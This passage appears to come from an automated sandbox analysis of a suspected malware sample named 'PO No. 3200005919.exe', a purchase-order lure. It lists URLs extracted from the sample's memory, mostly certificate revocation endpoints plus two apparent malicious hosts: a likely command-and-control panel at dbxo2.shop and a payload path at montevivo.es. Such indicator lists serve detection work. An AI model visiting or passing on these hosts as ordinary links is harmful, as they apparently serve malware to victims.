3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr, WMIMethod.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr, WMIMethod.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                    Source: PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr, WMIMethod.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                    Source: PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                    Source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr, WMIMethod.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: PO No. 3200005919.exe, 00000005.00000002.7257083339.000000001D3C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://dbxo2.shop/dbx2/index.php
                    Source: PO No. 3200005919.exe, 00000005.00000002.7238816533.00000000017A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dbxo2.shop/dbx2/index.php?
                    Source: PO No. 3200005919.exe, 00000005.00000002.7238680594.0000000001796000.00000004.00000020.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7238816533.00000000017A9000.00000004.00000020.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7239130262.00000000017D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://montevivo.es/lPkFJXszrxOMoP0.hhp
                    Source: PO No. 3200005919.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.drString found in binary or memory: http://ocsp.digicert.com0H
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.drString found in binary or memory: http://ocsp.digicert.com0I
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr, WMIMethod.dll.1.drString found in binary or memory: http://ocsp.digicert.com0O
                    Source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                    Source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                    Source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
